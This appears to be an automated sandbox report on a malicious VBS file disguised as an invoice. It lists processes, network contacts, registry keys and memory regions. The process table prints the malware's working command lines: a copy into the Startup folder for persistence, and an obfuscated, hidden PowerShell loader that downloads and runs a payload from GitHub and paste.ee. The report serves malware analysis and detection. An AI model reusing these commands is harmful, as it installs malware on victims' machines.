Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
FAKTURA-pdf-466366332.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34debwim.wtp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rrfpgxc.ks2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alcz2i0u.sd4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gn5cpp5x.0d5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdwx4ckn.x4e.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lopgtzat.ghk.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs',
'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName
+ ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+'
{0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+'
'+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t);
{0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1},
{'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1},
'+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/DjfVC/0
|
188.114.96.3
|
|
|
|
https://www.cloudflare.com/learning/access-management/phishing-attack/
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.108.133
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.cloudflare.com/5xx-error-landing
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.96.3
|
|
|
|
raw.githubusercontent.com
|
185.199.108.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1BEE2FBB000
|
heap
|
page read and write
|
||
|
24FEDE63000
|
heap
|
page read and write
|
||
|
24FEBC04000
|
heap
|
page read and write
|
||
|
7FFB4AB60000
|
trusted library allocation
|
page read and write
|
||
|
1BEE30AD000
|
heap
|
page read and write
|
||
|
1BEE2FBE000
|
heap
|
page read and write
|
||
|
7FFB4ABA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AA30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AA06000
|
trusted library allocation
|
page read and write
|
||
|
6F3E6FF000
|
stack
|
page read and write
|
||
|
690F07E000
|
stack
|
page read and write
|
||
|
1B9C8557000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B9DFEB1000
|
heap
|
page read and write
|
||
|
7FFB4ACA0000
|
trusted library allocation
|
page read and write
|
||
|
1B9C6160000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB01000
|
trusted library allocation
|
page read and write
|
||
|
1B9C7EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC50000
|
trusted library allocation
|
page read and write
|
||
|
1B9C5EA0000
|
heap
|
page read and write
|
||
|
1B9E00EA000
|
heap
|
page read and write
|
||
|
24FEDB9E000
|
heap
|
page read and write
|
||
|
1B9C8215000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ABB0000
|
trusted library allocation
|
page read and write
|
||
|
26436790000
|
heap
|
page read and write
|
||
|
1B9C6150000
|
heap
|
page readonly
|
||
|
1B9C7840000
|
heap
|
page read and write
|
||
|
FD696FF000
|
stack
|
page read and write
|
||
|
7FFB4AA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FEDC07000
|
heap
|
page read and write
|
||
|
1BEE3051000
|
heap
|
page read and write
|
||
|
7FFB4A952000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC00000
|
trusted library allocation
|
page read and write
|
||
|
1BEE12FD000
|
heap
|
page read and write
|
||
|
1BEE11F5000
|
heap
|
page read and write
|
||
|
690F2FE000
|
stack
|
page read and write
|
||
|
1BEE3251000
|
heap
|
page read and write
|
||
|
7FFB4AA0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
FD69AF8000
|
stack
|
page read and write
|
||
|
2641E73E000
|
trusted library allocation
|
page read and write
|
||
|
690EDD3000
|
stack
|
page read and write
|
||
|
FD69D7C000
|
stack
|
page read and write
|
||
|
2641E74F000
|
trusted library allocation
|
page read and write
|
||
|
2641C945000
|
heap
|
page read and write
|
||
|
2641C960000
|
heap
|
page readonly
|
||
|
690F73F000
|
stack
|
page read and write
|
||
|
1B9C94F3000
|
trusted library allocation
|
page read and write
|
||
|
2641C850000
|
heap
|
page read and write
|
||
|
2641CA30000
|
heap
|
page read and write
|
||
|
7FFB4AA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEE3250000
|
heap
|
page read and write
|
||
|
1B9E00F6000
|
heap
|
page read and write
|
||
|
26436748000
|
heap
|
page read and write
|
||
|
1B9E0147000
|
heap
|
page read and write
|
||
|
1B9DFFC7000
|
heap
|
page execute and read and write
|
||
|
1BEE1220000
|
heap
|
page read and write
|
||
|
7FFB4AC20000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ABD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC70000
|
trusted library allocation
|
page read and write
|
||
|
2641EBE2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ACE1000
|
trusted library allocation
|
page read and write
|
||
|
26436850000
|
heap
|
page execute and read and write
|
||
|
1B9C97BA000
|
trusted library allocation
|
page read and write
|
||
|
1BEE124E000
|
heap
|
page read and write
|
||
|
26436740000
|
heap
|
page read and write
|
||
|
1B9C90BD000
|
trusted library allocation
|
page read and write
|
||
|
1BEE1307000
|
heap
|
page read and write
|
||
|
7FFB4AB40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEE2FC9000
|
heap
|
page read and write
|
||
|
1BEE2F52000
|
heap
|
page read and write
|
||
|
7FFB4AB70000
|
trusted library allocation
|
page read and write
|
||
|
1BEE125F000
|
heap
|
page read and write
|
||
|
1BEE3098000
|
heap
|
page read and write
|
||
|
5FB457E000
|
stack
|
page read and write
|
||
|
7FFB4AC60000
|
trusted library allocation
|
page read and write
|
||
|
24F80155000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AA00000
|
trusted library allocation
|
page read and write
|
||
|
24F80404000
|
trusted library allocation
|
page read and write
|
||
|
1BEE3335000
|
heap
|
page read and write
|
||
|
7FFB4A970000
|
trusted library allocation
|
page read and write
|
||
|
2641C830000
|
trusted library allocation
|
page read and write
|
||
|
24FED5B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC80000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC70000
|
trusted library allocation
|
page read and write
|
||
|
24F80107000
|
trusted library allocation
|
page read and write
|
||
|
1B9E0196000
|
heap
|
page read and write
|
||
|
2641C790000
|
heap
|
page read and write
|
||
|
1B9C9B00000
|
trusted library allocation
|
page read and write
|
||
|
24FEBD65000
|
heap
|
page read and write
|
||
|
1BEE12FE000
|
heap
|
page read and write
|
||
|
1BEE32EC000
|
heap
|
page read and write
|
||
|
1B9C9B04000
|
trusted library allocation
|
page read and write
|
||
|
690F7BB000
|
stack
|
page read and write
|
||
|
1B9C821A000
|
trusted library allocation
|
page read and write
|
||
|
2641C950000
|
trusted library allocation
|
page read and write
|
||
|
2641CA10000
|
heap
|
page read and write
|
||
|
1B9C7934000
|
heap
|
page read and write
|
||
|
1BEE30C8000
|
heap
|
page read and write
|
||
|
1B9C5EFD000
|
heap
|
page read and write
|
||
|
2641EAD8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC00000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AA56000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F8005E000
|
trusted library allocation
|
page read and write
|
||
|
1B9C5EEB000
|
heap
|
page read and write
|
||
|
7FFB4AA36000
|
trusted library allocation
|
page execute and read and write
|
||
|
2641C9E0000
|
trusted library allocation
|
page read and write
|
||
|
24FEBBC8000
|
heap
|
page read and write
|
||
|
7FFB4AB80000
|
trusted library allocation
|
page read and write
|
||
|
2641C94A000
|
heap
|
page read and write
|
||
|
2641EEC0000
|
trusted library allocation
|
page read and write
|
||
|
24F80021000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AB0A000
|
trusted library allocation
|
page read and write
|
||
|
1B9C5E50000
|
heap
|
page read and write
|
||
|
7FFB4AC40000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ABF0000
|
trusted library allocation
|
page read and write
|
||
|
1BEE2F9B000
|
heap
|
page read and write
|
||
|
1B9E0190000
|
heap
|
page read and write
|
||
|
24F800F1000
|
trusted library allocation
|
page read and write
|
||
|
24FED530000
|
heap
|
page read and write
|
||
|
7FFB4AC50000
|
trusted library allocation
|
page read and write
|
||
|
1BEE32DF000
|
heap
|
page read and write
|
||
|
24F80608000
|
trusted library allocation
|
page read and write
|
||
|
1BEE3050000
|
heap
|
page read and write
|
||
|
1B9C8334000
|
trusted library allocation
|
page read and write
|
||
|
264368B0000
|
heap
|
page read and write
|
||
|
690F17E000
|
stack
|
page read and write
|
||
|
1BEE31C6000
|
heap
|
page read and write
|
||
|
1BEE31D8000
|
heap
|
page read and write
|
||
|
24F80027000
|
trusted library allocation
|
page read and write
|
||
|
1B9C77B0000
|
trusted library allocation
|
page read and write
|
||
|
1B9DFFC0000
|
heap
|
page execute and read and write
|
||
|
2641E752000
|
trusted library allocation
|
page read and write
|
||
|
24F90072000
|
trusted library allocation
|
page read and write
|
||
|
FD69978000
|
stack
|
page read and write
|
||
|
2641C8DF000
|
heap
|
page read and write
|
||
|
1BEE3335000
|
heap
|
page read and write
|
||
|
1BEE32ED000
|
heap
|
page read and write
|
||
|
2641E67B000
|
trusted library allocation
|
page read and write
|
||
|
1BEE1309000
|
heap
|
page read and write
|
||
|
2641E2D0000
|
heap
|
page execute and read and write
|
||
|
1B9D7E21000
|
trusted library allocation
|
page read and write
|
||
|
1B9C9731000
|
trusted library allocation
|
page read and write
|
||
|
1BEE3098000
|
heap
|
page read and write
|
||
|
7FFB4ABB0000
|
trusted library allocation
|
page read and write
|
||
|
24FEDE70000
|
heap
|
page read and write
|
||
|
1BEE2FA7000
|
heap
|
page read and write
|
||
|
7FFB4A9AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B9DFE4B000
|
heap
|
page read and write
|
||
|
2642E640000
|
trusted library allocation
|
page read and write
|
||
|
1B9C5F25000
|
heap
|
page read and write
|
||
|
24F800FA000
|
trusted library allocation
|
page read and write
|
||
|
1B9C77E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ABF0000
|
trusted library allocation
|
page read and write
|
||
|
2641C891000
|
heap
|
page read and write
|
||
|
2642E631000
|
trusted library allocation
|
page read and write
|
||
|
1B9C84B0000
|
trusted library allocation
|
page read and write
|
||
|
24FED5C0000
|
heap
|
page read and write
|
||
|
7FFB4A990000
|
trusted library allocation
|
page read and write
|
||
|
1BEE30D1000
|
heap
|
page read and write
|
||
|
1B9C5E10000
|
heap
|
page read and write
|
||
|
1B9DFE20000
|
heap
|
page read and write
|
||
|
1BEE2F72000
|
heap
|
page read and write
|
||
|
7FFB4ABD0000
|
trusted library allocation
|
page read and write
|
||
|
5FB44FF000
|
stack
|
page read and write
|
||
|
1BEE2F50000
|
heap
|
page read and write
|
||
|
1BEE2F82000
|
heap
|
page read and write
|
||
|
7FFB4A980000
|
trusted library allocation
|
page read and write
|
||
|
5FB427E000
|
stack
|
page read and write
|
||
|
FD697FE000
|
stack
|
page read and write
|
||
|
24FEDBF0000
|
heap
|
page read and write
|
||
|
24FEBBDE000
|
heap
|
page read and write
|
||
|
24F80530000
|
trusted library allocation
|
page read and write
|
||
|
1BEE1249000
|
heap
|
page read and write
|
||
|
1BEE3418000
|
heap
|
page read and write
|
||
|
5FB467C000
|
stack
|
page read and write
|
||
|
691030F000
|
stack
|
page read and write
|
||
|
7FFB4AD20000
|
trusted library allocation
|
page read and write
|
||
|
24FEBB80000
|
heap
|
page read and write
|
||
|
1B9C7DB0000
|
heap
|
page execute and read and write
|
||
|
1BEE2F5B000
|
heap
|
page read and write
|
||
|
2642E6A2000
|
trusted library allocation
|
page read and write
|
||
|
2641E699000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC50000
|
trusted library allocation
|
page read and write
|
||
|
FD692B3000
|
stack
|
page read and write
|
||
|
2641CA35000
|
heap
|
page read and write
|
||
|
24FEDC11000
|
heap
|
page read and write
|
||
|
6F3E3FE000
|
stack
|
page read and write
|
||
|
1B9C5F72000
|
heap
|
page read and write
|
||
|
1B9E00D0000
|
heap
|
page read and write
|
||
|
7FFB4AA20000
|
trusted library allocation
|
page read and write
|
||
|
1B9C953C000
|
trusted library allocation
|
page read and write
|
||
|
FD6933E000
|
stack
|
page read and write
|
||
|
1BEE2C00000
|
heap
|
page read and write
|
||
|
7FFB4AB90000
|
trusted library allocation
|
page read and write
|
||
|
2641E2E5000
|
heap
|
page read and write
|
||
|
7FFB4ABB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB60000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A974000
|
trusted library allocation
|
page read and write
|
||
|
1BEE30C6000
|
heap
|
page read and write
|
||
|
1BEE2FC9000
|
heap
|
page read and write
|
||
|
1BEE31F7000
|
heap
|
page read and write
|
||
|
2641C8B2000
|
heap
|
page read and write
|
||
|
24F804C7000
|
trusted library allocation
|
page read and write
|
||
|
2641C7B0000
|
heap
|
page read and write
|
||
|
5FB4377000
|
stack
|
page read and write
|
||
|
1BEE2F92000
|
heap
|
page read and write
|
||
|
7FFB4ABD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ABE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ABC0000
|
trusted library allocation
|
page read and write
|
||
|
264367A5000
|
heap
|
page read and write
|
||
|
24FED630000
|
heap
|
page execute and read and write
|
||
|
26436998000
|
heap
|
page read and write
|
||
|
2643699C000
|
heap
|
page read and write
|
||
|
690F6BE000
|
stack
|
page read and write
|
||
|
7FFB4AAF0000
|
trusted library allocation
|
page read and write
|
||
|
1B9E0410000
|
trusted library section
|
page read and write
|
||
|
2641E790000
|
trusted library allocation
|
page read and write
|
||
|
1B9C8359000
|
trusted library allocation
|
page read and write
|
||
|
1BEE2FC9000
|
heap
|
page read and write
|
||
|
7FFB4AC10000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A96C000
|
trusted library allocation
|
page read and write
|
||
|
24F800F4000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ACA0000
|
trusted library allocation
|
page read and write
|
||
|
2641E788000
|
trusted library allocation
|
page read and write
|
||
|
2641C89A000
|
heap
|
page read and write
|
||
|
7FFB4ABF0000
|
trusted library allocation
|
page read and write
|
||
|
1B9C8043000
|
trusted library allocation
|
page read and write
|
||
|
24FEDD57000
|
heap
|
page execute and read and write
|
||
|
1B9C7DE0000
|
heap
|
page read and write
|
||
|
1B9C820B000
|
trusted library allocation
|
page read and write
|
||
|
1BEE32F8000
|
heap
|
page read and write
|
||
|
1BEE3058000
|
heap
|
page read and write
|
||
|
7FFB4AC10000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A95D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEE31D0000
|
heap
|
page read and write
|
||
|
24FEBB50000
|
heap
|
page read and write
|
||
|
2641EB34000
|
trusted library allocation
|
page read and write
|
||
|
1BEE32F7000
|
heap
|
page read and write
|
||
|
24F80085000
|
trusted library allocation
|
page read and write
|
||
|
1BEE2FB2000
|
heap
|
page read and write
|
||
|
2641EEBA000
|
trusted library allocation
|
page read and write
|
||
|
5FB42F9000
|
stack
|
page read and write
|
||
|
7FFB4AA26000
|
trusted library allocation
|
page read and write
|
||
|
690F0FE000
|
stack
|
page read and write
|
||
|
7FFB4A98B000
|
trusted library allocation
|
page read and write
|
||
|
1B9C8349000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ACC0000
|
trusted library allocation
|
page read and write
|
||
|
24FEDD50000
|
heap
|
page execute and read and write
|
||
|
7FFB4ABC0000
|
trusted library allocation
|
page read and write
|
||
|
2641E744000
|
trusted library allocation
|
page read and write
|
||
|
2641C7F0000
|
heap
|
page read and write
|
||
|
7FFB4AB80000
|
trusted library allocation
|
page read and write
|
||
|
FD69B7F000
|
stack
|
page read and write
|
||
|
7FFB4AB90000
|
trusted library allocation
|
page read and write
|
||
|
1BEE3095000
|
heap
|
page read and write
|
||
|
1B9C5F23000
|
heap
|
page read and write
|
||
|
1BEE2FA2000
|
heap
|
page read and write
|
||
|
24FEDB80000
|
heap
|
page read and write
|
||
|
1BEE3360000
|
heap
|
page read and write
|
||
|
7FFB4AC30000
|
trusted library allocation
|
page read and write
|
||
|
1B9C7930000
|
heap
|
page read and write
|
||
|
1B9C6190000
|
heap
|
page read and write
|
||
|
7FFB4AC60000
|
trusted library allocation
|
page read and write
|
||
|
691020E000
|
stack
|
page read and write
|
||
|
2641E74C000
|
trusted library allocation
|
page read and write
|
||
|
24FEBC06000
|
heap
|
page read and write
|
||
|
7FFB4A960000
|
trusted library allocation
|
page read and write
|
||
|
1B9C6140000
|
trusted library allocation
|
page read and write
|
||
|
24F90001000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AB52000
|
trusted library allocation
|
page read and write
|
||
|
5FB41FE000
|
stack
|
page read and write
|
||
|
FD693FE000
|
stack
|
page read and write
|
||
|
6F3E7FD000
|
stack
|
page read and write
|
||
|
1BEE31CC000
|
heap
|
page read and write
|
||
|
1BEE3078000
|
heap
|
page read and write
|
||
|
2641E64B000
|
trusted library allocation
|
page read and write
|
||
|
1BEE3335000
|
heap
|
page read and write
|
||
|
1B9DFEB5000
|
heap
|
page read and write
|
||
|
5FB3DBE000
|
stack
|
page read and write
|
||
|
1BEE3071000
|
heap
|
page read and write
|
||
|
1BEE2F87000
|
heap
|
page read and write
|
||
|
7FFB4AC40000
|
trusted library allocation
|
page read and write
|
||
|
1BEE30B8000
|
heap
|
page read and write
|
||
|
264369DA000
|
heap
|
page read and write
|
||
|
2641C89E000
|
heap
|
page read and write
|
||
|
1BEE124F000
|
heap
|
page read and write
|
||
|
1BEE31F6000
|
heap
|
page read and write
|
||
|
7FFB4A95D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F80399000
|
trusted library allocation
|
page read and write
|
||
|
1BEE32F4000
|
heap
|
page read and write
|
||
|
7FFB4A972000
|
trusted library allocation
|
page read and write
|
||
|
24F800F7000
|
trusted library allocation
|
page read and write
|
||
|
1B9C826E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ACD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC70000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A954000
|
trusted library allocation
|
page read and write
|
||
|
1BEE1255000
|
heap
|
page read and write
|
||
|
1B9C7E21000
|
trusted library allocation
|
page read and write
|
||
|
1BEE2F51000
|
heap
|
page read and write
|
||
|
1B9C94EE000
|
trusted library allocation
|
page read and write
|
||
|
1BEE308D000
|
heap
|
page read and write
|
||
|
24FEDC03000
|
heap
|
page read and write
|
||
|
1B9DFE59000
|
heap
|
page read and write
|
||
|
FD6987E000
|
stack
|
page read and write
|
||
|
7FFB4AC90000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ABA0000
|
trusted library allocation
|
page read and write
|
||
|
1BEE307D000
|
heap
|
page read and write
|
||
|
24FEE220000
|
heap
|
page read and write
|
||
|
6F3E2FE000
|
stack
|
page read and write
|
||
|
7FFB4AB20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEE306C000
|
heap
|
page read and write
|
||
|
2641C8A0000
|
heap
|
page read and write
|
||
|
24FED590000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A953000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AA90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEE31E6000
|
heap
|
page read and write
|
||
|
7FFB4ABA0000
|
trusted library allocation
|
page read and write
|
||
|
1BEE30A8000
|
heap
|
page read and write
|
||
|
1B9C977A000
|
trusted library allocation
|
page read and write
|
||
|
5FB4478000
|
stack
|
page read and write
|
||
|
1B9C8200000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB50000
|
trusted library allocation
|
page read and write
|
||
|
1BEE32DF000
|
heap
|
page read and write
|
||
|
5FB417E000
|
stack
|
page read and write
|
||
|
691018F000
|
stack
|
page read and write
|
||
|
1BEE12D8000
|
heap
|
page read and write
|
||
|
7FFB4A970000
|
trusted library allocation
|
page read and write
|
||
|
1B9D7E92000
|
trusted library allocation
|
page read and write
|
||
|
26436B90000
|
heap
|
page read and write
|
||
|
24FEBD60000
|
heap
|
page read and write
|
||
|
